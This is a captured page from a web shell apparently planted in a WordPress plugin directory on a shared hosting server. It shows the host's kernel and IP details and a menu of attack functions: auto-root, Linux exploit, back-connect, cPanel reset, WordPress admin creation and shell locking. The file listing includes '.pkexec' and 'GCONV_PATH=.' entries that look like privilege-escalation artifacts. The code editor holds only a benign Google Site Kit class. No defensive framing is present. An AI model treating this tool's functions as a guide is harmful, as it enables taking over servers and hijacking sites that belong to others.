Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.16.82.195
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Advanced_Tracking
[ DIR ]
drwxr-xr-x
Conversion_Reporting
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
GoogleAnalyticsAdmin
[ DIR ]
drwxr-xr-x
Report
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AMP_Tag.php
5.15
KB
-rw-r--r--
Account_Ticket.php
3.44
KB
-rw-r--r--
Advanced_Tracking.php
3.96
KB
-rw-r--r--
Audience_Settings.php
2.41
KB
-rw-r--r--
Custom_Dimensions_Data_Availab...
3.53
KB
-rw-r--r--
PivotReport.php
2.16
KB
-rw-r--r--
Report.php
990
B
-rw-r--r--
Reset_Audiences.php
3.86
KB
-rw-r--r--
Resource_Data_Availability_Dat...
7.55
KB
-rw-r--r--
Settings.php
6.36
KB
-rw-r--r--
Synchronize_AdSenseLinked.php
4.48
KB
-rw-r--r--
Synchronize_AdsLinked.php
3.21
KB
-rw-r--r--
Synchronize_Property.php
4.13
KB
-rw-r--r--
Tag_Guard.php
878
B
-rw-r--r--
Tag_Interface.php
821
B
-rw-r--r--
Tag_Matchers.php
2.1
KB
-rw-r--r--
Web_Tag.php
6.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Account_Ticket.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\Account_Ticket * * @package Google\Site_Kit * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4; /** * Class representing an account ticket for Analytics 4 account provisioning with associated parameters. * * @since 1.98.0 * @access private * @ignore */ class Account_Ticket { /** * Account ticket ID. * * @since 1.98.0 * @var string */ protected $id; /** * Property name. * * @since 1.98.0 * @var string */ protected $property_name; /** * Data stream name. * * @since 1.98.0 * @var string */ protected $data_stream_name; /** * Timezone. * * @since 1.98.0 * @var string */ protected $timezone; /** * Whether or not enhanced measurement should be enabled. * * @since 1.111.0 * @var boolean */ protected $enhanced_measurement_stream_enabled; /** * Constructor. * * @since 1.98.0 * * @param array $data Data to hydrate properties with. */ public function __construct( $data = null ) { if ( ! is_array( $data ) ) { return; } foreach ( $data as $key => $value ) { if ( property_exists( $this, $key ) ) { $this->{"set_$key"}( $value ); } } } /** * Gets the account ticket ID. * * @since 1.98.0 * * @return string */ public function get_id() { return $this->id; } /** * Sets the account ticket ID. * * @since 1.98.0 * * @param string $id Account ticket ID. */ public function set_id( $id ) { $this->id = (string) $id; } /** * Gets the property name. * * @since 1.98.0 * * @return string */ public function get_property_name() { return $this->property_name; } /** * Sets the property name. * * @since 1.98.0 * * @param string $property_name Property name. */ public function set_property_name( $property_name ) { $this->property_name = (string) $property_name; } /** * Gets the data stream name. * * @since 1.98.0 * * @return string */ public function get_data_stream_name() { return $this->data_stream_name; } /** * Sets the data stream name. * * @since 1.98.0 * * @param string $data_stream_name Data stream name. */ public function set_data_stream_name( $data_stream_name ) { $this->data_stream_name = (string) $data_stream_name; } /** * Gets the timezone. * * @since 1.98.0 * * @return string */ public function get_timezone() { return $this->timezone; } /** * Sets the timezone. * * @since 1.98.0 * * @param string $timezone Timezone. */ public function set_timezone( $timezone ) { $this->timezone = (string) $timezone; } /** * Gets the enabled state of enhanced measurement for the data stream. * * @since 1.111.0 * * @return bool $enabled Enabled state. */ public function get_enhanced_measurement_stream_enabled() { return $this->enhanced_measurement_stream_enabled; } /** * Sets the enabled state of enhanced measurement for the data stream. * * @since 1.111.0 * * @param bool $enabled Enabled state. */ public function set_enhanced_measurement_stream_enabled( $enabled ) { $this->enhanced_measurement_stream_enabled = (bool) $enabled; } /** * Gets the array representation of the instance values. * * @since 1.98.0 * * @return array */ public function to_array() { return get_object_vars( $this ); } }
Close